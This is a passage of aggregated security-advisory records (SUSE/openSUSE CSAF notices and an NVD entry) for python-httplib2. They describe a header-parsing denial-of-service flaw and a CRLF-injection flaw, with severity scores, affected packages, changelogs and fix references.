contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "SUSE OpenStack Cloud 9:python-httplib2-0.19.0-8.3.4.noarch", "SUSE OpenStack Cloud Crowbar 9:python-httplib2-0.19.0-8.3.4.noarch", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "SUSE OpenStack Cloud 9:python-httplib2-0.19.0-8.3.4.noarch", "SUSE OpenStack Cloud Crowbar 9:python-httplib2-0.19.0-8.3.4.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "SUSE OpenStack Cloud 9:python-httplib2-0.19.0-8.3.4.noarch", "SUSE OpenStack Cloud Crowbar 9:python-httplib2-0.19.0-8.3.4.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-27T09:44:14Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
fkie_cve-2021-21240
Vulnerability from fkie_nvd
Published
2021-02-08 20:15
Modified
2024-11-21 05:47
Severity ?
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
7.5 (High) - CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Summary
httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of "\xa0" characters in the "www-authenticate" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| httplib2_project | httplib2 | * |
{ configurations: [ { nodes: [ { cpeMatch: [ { criteria: "cpe:2.3:a:httplib2_project:httplib2:*:*:*:*:*:python:*:*", matchCriteriaId: "D5BA135E-6889-4A5D-88F6-1AD4DBC498BE", versionEndExcluding: "0.19.0", vulnerable: true, }, ], negate: false, operator: "OR", }, ], }, ], cveTags: [], descriptions: [ { lang: "en", value: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", }, { lang: "es", value: "httplib2 es una biblioteca cliente HTTP completa para Python. En httplib2 anterior a la versión 0.19.0, un servidor malicioso que responde con una larga serie de caracteres \"\\xa0\" en el encabezado \"www-authenticate\" puede causar una Denegación de Servicio (CPU quemada mientras analiza el encabezado) del cliente httplib2 que accede a dicho servidor. Esto se corrigió en la versión 0.19.0, que contiene una nueva implementación de análisis de encabezados de autenticación usando la biblioteca pyparsing", }, ], id: "CVE-2021-21240", lastModified: "2024-11-21T05:47:50.650", metrics: { cvssMetricV2: [ { acInsufInfo: false, baseSeverity: "MEDIUM", cvssData: { accessComplexity: "LOW", accessVector: "NETWORK", authentication: "NONE", availabilityImpact: "PARTIAL", baseScore: 5, confidentialityImpact: "NONE", integrityImpact: "NONE", vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:P", version: "2.0", }, exploitabilityScore: 10, impactScore: 2.9, obtainAllPrivilege: false, obtainOtherPrivilege: false, obtainUserPrivilege: false, source: "nvd@nist.gov", type: "Primary", userInteractionRequired: false, }, ], cvssMetricV31: [ { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 3.6, source: "security-advisories@github.com", type: "Secondary", }, { cvssData: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, exploitabilityScore: 3.9, impactScore: 3.6, source: "nvd@nist.gov", type: "Primary", }, ], }, published: "2021-02-08T20:15:12.197", references: [ { source: "security-advisories@github.com", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", }, { source: "security-advisories@github.com", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/httplib2/httplib2/pull/182", }, { source: "security-advisories@github.com", tags: [ "Exploit", "Mitigation", "Third Party Advisory", ], url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, { source: "security-advisories@github.com", tags: [ "Product", "Third Party Advisory", ], url: "https://pypi.org/project/httplib2", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/httplib2/httplib2/commit/bd9ee252c8f099608019709e22c0d705e98d26bc", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Patch", "Third Party Advisory", ], url: "https://github.com/httplib2/httplib2/pull/182", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Exploit", "Mitigation", "Third Party Advisory", ], url: "https://github.com/httplib2/httplib2/security/advisories/GHSA-93xj-8mrv-444m", }, { source: "af854a3a-2127-422b-91ae-364da2661108", tags: [ "Product", "Third Party Advisory", ], url: "https://pypi.org/project/httplib2", }, ], sourceIdentifier: "security-advisories@github.com", vulnStatus: "Modified", weaknesses: [ { description: [ { lang: "en", value: "CWE-400", }, ], source: "security-advisories@github.com", type: "Primary", }, ], }
opensuse-su-2021:0772-1
Vulnerability from csaf_opensuse
Published
2021-05-23 04:05
Modified
2021-05-23 04:05
Summary
Security update for python-httplib2
Notes
Title of the patch
Security update for python-httplib2
Description of the patch
This update for python-httplib2 contains the following fixes:
Security fixes included in this update:
- CVE-2021-21240: Fixed a regular expression denial of service via malicious header (bsc#1182053).
- CVE-2020-11078: Fixed an issue where an attacker could change request headers and body (bsc#1171998).
Non security fixes included in this update:
- Update in SLE to 0.19.0 (bsc#1182053, CVE-2021-21240)
- update to 0.19.0:
* auth: parse headers using pyparsing instead of regexp
* auth: WSSE token needs to be string not bytes
- update to 0.18.1: (bsc#1171998, CVE-2020-11078)
* explicit build-backend workaround for pip build isolation bug
* IMPORTANT security vulnerability CWE-93 CRLF injection
Force %xx quote of space, CR, LF characters in uri.
* Ship test suite in source dist
- Update to 0.17.1
* python3: no_proxy was not checked with https
* feature: Http().redirect_codes set, works after follow(_all)_redirects check
This allows one line workaround for old gcloud library that uses 308
response without redirect semantics.
* IMPORTANT cache invalidation change, fix 307 keep method, add 308 Redirects
* proxy: username/password as str compatible with pysocks
* python2: regression in connect() error handling
* add support for password protected certificate files
* feature: Http.close() to clean persistent connections and sensitive data
- Update to 0.14.0:
* Python3: PROXY_TYPE_SOCKS5 with str user/pass raised TypeError
- version update to 0.13.1
0.13.1
* Python3: Use no_proxy
https://github.com/httplib2/httplib2/pull/140
0.13.0
* Allow setting TLS max/min versions
https://github.com/httplib2/httplib2/pull/138
0.12.3
* No changes to library. Distribute py3 wheels.
0.12.1
* Catch socket timeouts and clear dead connection
https://github.com/httplib2/httplib2/issues/18
https://github.com/httplib2/httplib2/pull/111
* Officially support Python 3.7 (package metadata)
https://github.com/httplib2/httplib2/issues/123
0.12.0
* Drop support for Python 3.3
* ca_certs from environment HTTPLIB2_CA_CERTS or certifi
https://github.com/httplib2/httplib2/pull/117
* PROXY_TYPE_HTTP with non-empty user/pass raised TypeError: bytes required
https://github.com/httplib2/httplib2/pull/115
* Revert http:443->https workaround
https://github.com/httplib2/httplib2/issues/112
* eliminate connection pool read race
https://github.com/httplib2/httplib2/pull/110
* cache: stronger safename
https://github.com/httplib2/httplib2/pull/101
0.11.3
* No changes, just reupload of 0.11.2 after fixing automatic release conditions in Travis.
0.11.2
* proxy: py3 NameError basestring
https://github.com/httplib2/httplib2/pull/100
0.11.1
* Fix HTTP(S)ConnectionWithTimeout AttributeError proxy_info
https://github.com/httplib2/httplib2/pull/97
0.11.0
* Add DigiCert Global Root G2 serial 033af1e6a711a9a0bb2864b11d09fae5
https://github.com/httplib2/httplib2/pull/91
* python3 proxy support
https://github.com/httplib2/httplib2/pull/90
* If no_proxy environment value ends with comma then proxy is not used
https://github.com/httplib2/httplib2/issues/11
* fix UnicodeDecodeError using socks5 proxy
https://github.com/httplib2/httplib2/pull/64
* Respect NO_PROXY env var in proxy_info_from_url
https://github.com/httplib2/httplib2/pull/58
* NO_PROXY=bar was matching foobar (suffix without dot delimiter)
New behavior matches curl/wget:
- no_proxy=foo.bar will only skip proxy for exact hostname match
- no_proxy=.wild.card will skip proxy for any.subdomains.wild.card
https://github.com/httplib2/httplib2/issues/94
* Bugfix for Content-Encoding: deflate
https://stackoverflow.com/a/22311297
- deleted patches
- Removing certifi patch:
httplib2 started to use certifi and this is already bent to
use system certificate bundle by another patch
This update was imported from the SUSE:SLE-15:Update update project.
Patchnames
openSUSE-2021-772
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-httplib2", title: "Title of the patch", }, { category: "description", text: "This update for python-httplib2 contains the following fixes:\n\nSecurity fixes included in this update:\n- CVE-2021-21240: Fixed a regular expression denial of service via malicious header (bsc#1182053).\n- CVE-2020-11078: Fixed an issue where an attacker could change request headers and body (bsc#1171998).\n\nNon security fixes included in this update:\n- Update in SLE to 0.19.0 (bsc#1182053, CVE-2021-21240)\n\n- update to 0.19.0:\n * auth: parse headers using pyparsing instead of regexp\n * auth: WSSE token needs to be string not bytes\n\n- update to 0.18.1: (bsc#1171998, CVE-2020-11078)\n * explicit build-backend workaround for pip build isolation bug\n * IMPORTANT security vulnerability CWE-93 CRLF injection\n Force %xx quote of space, CR, LF characters in uri.\n * Ship test suite in source dist\n\n- Update to 0.17.1\n * python3: no_proxy was not checked with https\n * feature: Http().redirect_codes set, works after follow(_all)_redirects check\n This allows one line workaround for old gcloud library that uses 308\n response without redirect semantics.\n * IMPORTANT cache invalidation change, fix 307 keep method, add 308 Redirects\n * proxy: username/password as str compatible with pysocks\n * python2: regression in connect() error handling\n * add support for password protected certificate files\n * feature: Http.close() to clean persistent connections and sensitive data\n\n- Update to 0.14.0:\n * Python3: PROXY_TYPE_SOCKS5 with str user/pass raised TypeError\n\n- version update to 0.13.1\n 0.13.1\n * Python3: Use no_proxy\n https://github.com/httplib2/httplib2/pull/140\n 0.13.0\n * Allow setting TLS max/min versions\n https://github.com/httplib2/httplib2/pull/138\n 0.12.3\n * No changes to library. Distribute py3 wheels.\n 0.12.1\n * Catch socket timeouts and clear dead connection\n https://github.com/httplib2/httplib2/issues/18\n https://github.com/httplib2/httplib2/pull/111\n * Officially support Python 3.7 (package metadata)\n https://github.com/httplib2/httplib2/issues/123\n 0.12.0\n * Drop support for Python 3.3\n * ca_certs from environment HTTPLIB2_CA_CERTS or certifi\n https://github.com/httplib2/httplib2/pull/117\n * PROXY_TYPE_HTTP with non-empty user/pass raised TypeError: bytes required\n https://github.com/httplib2/httplib2/pull/115\n * Revert http:443->https workaround\n https://github.com/httplib2/httplib2/issues/112\n * eliminate connection pool read race\n https://github.com/httplib2/httplib2/pull/110\n * cache: stronger safename\n https://github.com/httplib2/httplib2/pull/101\n 0.11.3\n * No changes, just reupload of 0.11.2 after fixing automatic release conditions in Travis.\n 0.11.2\n * proxy: py3 NameError basestring\n https://github.com/httplib2/httplib2/pull/100\n 0.11.1\n * Fix HTTP(S)ConnectionWithTimeout AttributeError proxy_info\n https://github.com/httplib2/httplib2/pull/97\n 0.11.0\n * Add DigiCert Global Root G2 serial 033af1e6a711a9a0bb2864b11d09fae5\n https://github.com/httplib2/httplib2/pull/91\n * python3 proxy support\n https://github.com/httplib2/httplib2/pull/90\n * If no_proxy environment value ends with comma then proxy is not used\n https://github.com/httplib2/httplib2/issues/11\n * fix UnicodeDecodeError using socks5 proxy\n https://github.com/httplib2/httplib2/pull/64\n * Respect NO_PROXY env var in proxy_info_from_url\n https://github.com/httplib2/httplib2/pull/58\n * NO_PROXY=bar was matching foobar (suffix without dot delimiter)\n New behavior matches curl/wget:\n - no_proxy=foo.bar will only skip proxy for exact hostname match\n - no_proxy=.wild.card will skip proxy for any.subdomains.wild.card\n https://github.com/httplib2/httplib2/issues/94\n * Bugfix for Content-Encoding: deflate\n https://stackoverflow.com/a/22311297\n- deleted patches\n - Removing certifi patch:\n httplib2 started to use certifi and this is already bent to\n use system certificate bundle by another patch\n\nThis update was imported from the SUSE:SLE-15:Update update project.", title: "Description of the patch", }, { category: "details", text: "openSUSE-2021-772", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2021_0772-1.json", }, { category: "self", summary: "URL for openSUSE-SU-2021:0772-1", url: "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/ANZIEBB4AJVGYC2KYDE7RDSTFBBTL5ID/", }, { category: "self", summary: "E-Mail link for openSUSE-SU-2021:0772-1", url: "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/ANZIEBB4AJVGYC2KYDE7RDSTFBBTL5ID/", }, { category: "self", summary: "SUSE Bug 1171998", url: "https://bugzilla.suse.com/1171998", }, { category: "self", summary: "SUSE Bug 1182053", url: "https://bugzilla.suse.com/1182053", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: "https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], title: "Security update for python-httplib2", tracking: { current_release_date: "2021-05-23T04:05:51Z", generator: { date: "2021-05-23T04:05:51Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "openSUSE-SU-2021:0772-1", initial_release_date: "2021-05-23T04:05:51Z", revision_history: [ { date: "2021-05-23T04:05:51Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python2-httplib2-0.19.0-lp152.6.3.1.noarch", product: { name: "python2-httplib2-0.19.0-lp152.6.3.1.noarch", product_id: "python2-httplib2-0.19.0-lp152.6.3.1.noarch", }, }, { category: "product_version", name: "python3-httplib2-0.19.0-lp152.6.3.1.noarch", product: { name: "python3-httplib2-0.19.0-lp152.6.3.1.noarch", product_id: "python3-httplib2-0.19.0-lp152.6.3.1.noarch", }, }, ], category: "architecture", name: "noarch", }, { branches: [ { category: "product_name", name: "openSUSE Leap 15.2", product: { name: "openSUSE Leap 15.2", product_id: "openSUSE Leap 15.2", product_identification_helper: { cpe: "cpe:/o:opensuse:leap:15.2", }, }, }, ], category: "product_family", name: "SUSE Linux Enterprise", }, ], category: "vendor", name: "SUSE", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "python2-httplib2-0.19.0-lp152.6.3.1.noarch as component of openSUSE Leap 15.2", product_id: "openSUSE Leap 15.2:python2-httplib2-0.19.0-lp152.6.3.1.noarch", }, product_reference: "python2-httplib2-0.19.0-lp152.6.3.1.noarch", relates_to_product_reference: "openSUSE Leap 15.2", }, { category: "default_component_of", full_product_name: { name: "python3-httplib2-0.19.0-lp152.6.3.1.noarch as component of openSUSE Leap 15.2", product_id: "openSUSE Leap 15.2:python3-httplib2-0.19.0-lp152.6.3.1.noarch", }, product_reference: "python3-httplib2-0.19.0-lp152.6.3.1.noarch", relates_to_product_reference: "openSUSE Leap 15.2", }, ], }, vulnerabilities: [ { cve: "CVE-2020-11078", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2020-11078", }, ], notes: [ { category: "general", text: "In httplib2 before version 0.18.0, an attacker controlling unescaped part of uri for `httplib2.Http.request()` could change request headers and body, send additional hidden requests to same server. This vulnerability impacts software that uses httplib2 with uri constructed by string concatenation, as opposed to proper urllib building with escaping. This has been fixed in 0.18.0.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Leap 15.2:python2-httplib2-0.19.0-lp152.6.3.1.noarch", "openSUSE Leap 15.2:python3-httplib2-0.19.0-lp152.6.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2020-11078", url: "https://www.suse.com/security/cve/CVE-2020-11078", }, { category: "external", summary: "SUSE Bug 1171998 for CVE-2020-11078", url: "https://bugzilla.suse.com/1171998", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Leap 15.2:python2-httplib2-0.19.0-lp152.6.3.1.noarch", "openSUSE Leap 15.2:python3-httplib2-0.19.0-lp152.6.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.8, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N", version: "3.1", }, products: [ "openSUSE Leap 15.2:python2-httplib2-0.19.0-lp152.6.3.1.noarch", "openSUSE Leap 15.2:python3-httplib2-0.19.0-lp152.6.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-23T04:05:51Z", details: "moderate", }, ], title: "CVE-2020-11078", }, { cve: "CVE-2021-21240", ids: [ { system_name: "SUSE CVE Page", text: "https://www.suse.com/security/cve/CVE-2021-21240", }, ], notes: [ { category: "general", text: "httplib2 is a comprehensive HTTP client library for Python. In httplib2 before version 0.19.0, a malicious server which responds with long series of \"\\xa0\" characters in the \"www-authenticate\" header may cause Denial of Service (CPU burn while parsing header) of the httplib2 client accessing said server. This is fixed in version 0.19.0 which contains a new implementation of auth headers parsing using the pyparsing library.", title: "CVE description", }, ], product_status: { recommended: [ "openSUSE Leap 15.2:python2-httplib2-0.19.0-lp152.6.3.1.noarch", "openSUSE Leap 15.2:python3-httplib2-0.19.0-lp152.6.3.1.noarch", ], }, references: [ { category: "external", summary: "CVE-2021-21240", url: "https://www.suse.com/security/cve/CVE-2021-21240", }, { category: "external", summary: "SUSE Bug 1182053 for CVE-2021-21240", url: "https://bugzilla.suse.com/1182053", }, ], remediations: [ { category: "vendor_fix", details: "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n", product_ids: [ "openSUSE Leap 15.2:python2-httplib2-0.19.0-lp152.6.3.1.noarch", "openSUSE Leap 15.2:python3-httplib2-0.19.0-lp152.6.3.1.noarch", ], }, ], scores: [ { cvss_v3: { baseScore: 6.5, baseSeverity: "MEDIUM", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "openSUSE Leap 15.2:python2-httplib2-0.19.0-lp152.6.3.1.noarch", "openSUSE Leap 15.2:python3-httplib2-0.19.0-lp152.6.3.1.noarch", ], }, ], threats: [ { category: "impact", date: "2021-05-23T04:05:51Z", details: "moderate", }, ], title: "CVE-2021-21240", }, ], }
opensuse-su-2021:0796-1
Vulnerability from csaf_opensuse
Published
2021-05-26 12:05
Modified
2021-05-26 12:05
Summary
Security update for python-httplib2
Notes
Title of the patch
Security update for python-httplib2
Description of the patch
This update for python-httplib2 contains the following fixes:
Security fixes included in this update:
- CVE-2021-21240: Fixed a regular expression denial of service via malicious header (bsc#1182053).
- CVE-2020-11078: Fixed an issue where an attacker could change request headers and body (bsc#1171998).
Non security fixes included in this update:
- Update in SLE to 0.19.0 (bsc#1182053, CVE-2021-21240)
- update to 0.19.0:
* auth: parse headers using pyparsing instead of regexp
* auth: WSSE token needs to be string not bytes
- update to 0.18.1: (bsc#1171998, CVE-2020-11078)
* explicit build-backend workaround for pip build isolation bug
* IMPORTANT security vulnerability CWE-93 CRLF injection
Force %xx quote of space, CR, LF characters in uri.
* Ship test suite in source dist
- Update to 0.17.1
* python3: no_proxy was not checked with https
* feature: Http().redirect_codes set, works after follow(_all)_redirects check
This allows one line workaround for old gcloud library that uses 308
response without redirect semantics.
* IMPORTANT cache invalidation change, fix 307 keep method, add 308 Redirects
* proxy: username/password as str compatible with pysocks
* python2: regression in connect() error handling
* add support for password protected certificate files
* feature: Http.close() to clean persistent connections and sensitive data
- Update to 0.14.0:
* Python3: PROXY_TYPE_SOCKS5 with str user/pass raised TypeError
- version update to 0.13.1
0.13.1
* Python3: Use no_proxy
https://github.com/httplib2/httplib2/pull/140
0.13.0
* Allow setting TLS max/min versions
https://github.com/httplib2/httplib2/pull/138
0.12.3
* No changes to library. Distribute py3 wheels.
0.12.1
* Catch socket timeouts and clear dead connection
https://github.com/httplib2/httplib2/issues/18
https://github.com/httplib2/httplib2/pull/111
* Officially support Python 3.7 (package metadata)
https://github.com/httplib2/httplib2/issues/123
0.12.0
* Drop support for Python 3.3
* ca_certs from environment HTTPLIB2_CA_CERTS or certifi
https://github.com/httplib2/httplib2/pull/117
* PROXY_TYPE_HTTP with non-empty user/pass raised TypeError: bytes required
https://github.com/httplib2/httplib2/pull/115
* Revert http:443->https workaround
https://github.com/httplib2/httplib2/issues/112
* eliminate connection pool read race
https://github.com/httplib2/httplib2/pull/110
* cache: stronger safename
https://github.com/httplib2/httplib2/pull/101
0.11.3
* No changes, just reupload of 0.11.2 after fixing automatic release conditions in Travis.
0.11.2
* proxy: py3 NameError basestring
https://github.com/httplib2/httplib2/pull/100
0.11.1
* Fix HTTP(S)ConnectionWithTimeout AttributeError proxy_info
https://github.com/httplib2/httplib2/pull/97
0.11.0
* Add DigiCert Global Root G2 serial 033af1e6a711a9a0bb2864b11d09fae5
https://github.com/httplib2/httplib2/pull/91
* python3 proxy support
https://github.com/httplib2/httplib2/pull/90
* If no_proxy environment value ends with comma then proxy is not used
https://github.com/httplib2/httplib2/issues/11
* fix UnicodeDecodeError using socks5 proxy
https://github.com/httplib2/httplib2/pull/64
* Respect NO_PROXY env var in proxy_info_from_url
https://github.com/httplib2/httplib2/pull/58
* NO_PROXY=bar was matching foobar (suffix without dot delimiter)
New behavior matches curl/wget:
- no_proxy=foo.bar will only skip proxy for exact hostname match
- no_proxy=.wild.card will skip proxy for any.subdomains.wild.card
https://github.com/httplib2/httplib2/issues/94
* Bugfix for Content-Encoding: deflate
https://stackoverflow.com/a/22311297
- deleted patches
- Removing certifi patch:
httplib2 started to use certifi and this is already bent to
use system certificate bundle by another patch
This update was imported from the SUSE:SLE-15:Update update project.
This update was imported from the openSUSE:Leap:15.2:Update update project.
Patchnames
openSUSE-2021-796
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{ document: { aggregate_severity: { namespace: "https://www.suse.com/support/security/rating/", text: "moderate", }, category: "csaf_security_advisory", csaf_version: "2.0", distribution: { text: "Copyright 2024 SUSE LLC. All rights reserved.", tlp: { label: "WHITE", url: "https://www.first.org/tlp/", }, }, lang: "en", notes: [ { category: "summary", text: "Security update for python-httplib2", title: "Title of the patch", }, { category: "description", text: "This update for python-httplib2 contains the following fixes:\n\nSecurity fixes included in this update:\n- CVE-2021-21240: Fixed a regular expression denial of service via malicious header (bsc#1182053).\n- CVE-2020-11078: Fixed an issue where an attacker could change request headers and body (bsc#1171998).\n\nNon security fixes included in this update:\n- Update in SLE to 0.19.0 (bsc#1182053, CVE-2021-21240)\n\n- update to 0.19.0:\n * auth: parse headers using pyparsing instead of regexp\n * auth: WSSE token needs to be string not bytes\n\n- update to 0.18.1: (bsc#1171998, CVE-2020-11078)\n * explicit build-backend workaround for pip build isolation bug\n * IMPORTANT security vulnerability CWE-93 CRLF injection\n Force %xx quote of space, CR, LF characters in uri.\n * Ship test suite in source dist\n\n- Update to 0.17.1\n * python3: no_proxy was not checked with https\n * feature: Http().redirect_codes set, works after follow(_all)_redirects check\n This allows one line workaround for old gcloud library that uses 308\n response without redirect semantics.\n * IMPORTANT cache invalidation change, fix 307 keep method, add 308 Redirects\n * proxy: username/password as str compatible with pysocks\n * python2: regression in connect() error handling\n * add support for password protected certificate files\n * feature: Http.close() to clean persistent connections and sensitive data\n\n- Update to 0.14.0:\n * Python3: PROXY_TYPE_SOCKS5 with str user/pass raised TypeError\n\n- version update to 0.13.1\n 0.13.1\n * Python3: Use no_proxy\n https://github.com/httplib2/httplib2/pull/140\n 0.13.0\n * Allow setting TLS max/min versions\n https://github.com/httplib2/httplib2/pull/138\n 0.12.3\n * No changes to library. Distribute py3 wheels.\n 0.12.1\n * Catch socket timeouts and clear dead connection\n https://github.com/httplib2/httplib2/issues/18\n https://github.com/httplib2/httplib2/pull/111\n * Officially support Python 3.7 (package metadata)\n https://github.com/httplib2/httplib2/issues/123\n 0.12.0\n * Drop support for Python 3.3\n * ca_certs from environment HTTPLIB2_CA_CERTS or certifi\n https://github.com/httplib2/httplib2/pull/117\n * PROXY_TYPE_HTTP with non-empty user/pass raised TypeError: bytes required\n https://github.com/httplib2/httplib2/pull/115\n * Revert http:443->https workaround\n https://github.com/httplib2/httplib2/issues/112\n * eliminate connection pool read race\n https://github.com/httplib2/httplib2/pull/110\n * cache: stronger safename\n https://github.com/httplib2/httplib2/pull/101\n 0.11.3\n * No changes, just reupload of 0.11.2 after fixing automatic release conditions in Travis.\n 0.11.2\n * proxy: py3 NameError basestring\n https://github.com/httplib2/httplib2/pull/100\n 0.11.1\n * Fix HTTP(S)ConnectionWithTimeout AttributeError proxy_info\n https://github.com/httplib2/httplib2/pull/97\n 0.11.0\n * Add DigiCert Global Root G2 serial 033af1e6a711a9a0bb2864b11d09fae5\n https://github.com/httplib2/httplib2/pull/91\n * python3 proxy support\n https://github.com/httplib2/httplib2/pull/90\n * If no_proxy environment value ends with comma then proxy is not used\n https://github.com/httplib2/httplib2/issues/11\n * fix UnicodeDecodeError using socks5 proxy\n https://github.com/httplib2/httplib2/pull/64\n * Respect NO_PROXY env var in proxy_info_from_url\n https://github.com/httplib2/httplib2/pull/58\n * NO_PROXY=bar was matching foobar (suffix without dot delimiter)\n New behavior matches curl/wget:\n - no_proxy=foo.bar will only skip proxy for exact hostname match\n - no_proxy=.wild.card will skip proxy for any.subdomains.wild.card\n https://github.com/httplib2/httplib2/issues/94\n * Bugfix for Content-Encoding: deflate\n https://stackoverflow.com/a/22311297\n- deleted patches\n - Removing certifi patch:\n httplib2 started to use certifi and this is already bent to\n use system certificate bundle by another patch\n\nThis update was imported from the SUSE:SLE-15:Update update project.\nThis update was imported from the openSUSE:Leap:15.2:Update update project.", title: "Description of the patch", }, { category: "details", text: "openSUSE-2021-796", title: "Patchnames", }, { category: "legal_disclaimer", text: "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).", title: "Terms of use", }, ], publisher: { category: "vendor", contact_details: "https://www.suse.com/support/security/contact/", name: "SUSE Product Security Team", namespace: "https://www.suse.com/", }, references: [ { category: "external", summary: "SUSE ratings", url: "https://www.suse.com/support/security/rating/", }, { category: "self", summary: "URL of this CSAF notice", url: "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2021_0796-1.json", }, { category: "self", summary: "URL for openSUSE-SU-2021:0796-1", url: "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/BX6XMG6VSE6RQ4LZXDDXUYZZZ2FYOQM7/", }, { category: "self", summary: "E-Mail link for openSUSE-SU-2021:0796-1", url: "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/BX6XMG6VSE6RQ4LZXDDXUYZZZ2FYOQM7/", }, { category: "self", summary: "SUSE Bug 1171998", url: "https://bugzilla.suse.com/1171998", }, { category: "self", summary: "SUSE Bug 1182053", url: "https://bugzilla.suse.com/1182053", }, { category: "self", summary: "SUSE CVE CVE-2020-11078 page", url: "https://www.suse.com/security/cve/CVE-2020-11078/", }, { category: "self", summary: "SUSE CVE CVE-2021-21240 page", url: "https://www.suse.com/security/cve/CVE-2021-21240/", }, ], title: "Security update for python-httplib2", tracking: { current_release_date: "2021-05-26T12:05:23Z", generator: { date: "2021-05-26T12:05:23Z", engine: { name: "cve-database.git:bin/generate-csaf.pl", version: "1", }, }, id: "openSUSE-SU-2021:0796-1", initial_release_date: "2021-05-26T12:05:23Z", revision_history: [ { date: "2021-05-26T12:05:23Z", number: "1", summary: "Current version", }, ], status: "final", version: "1", }, }, product_tree: { branches: [ { branches: [ { branches: [ { category: "product_version", name: "python2-httplib2-0.19.0-bp152.3.3.1.noarch", product: { name: 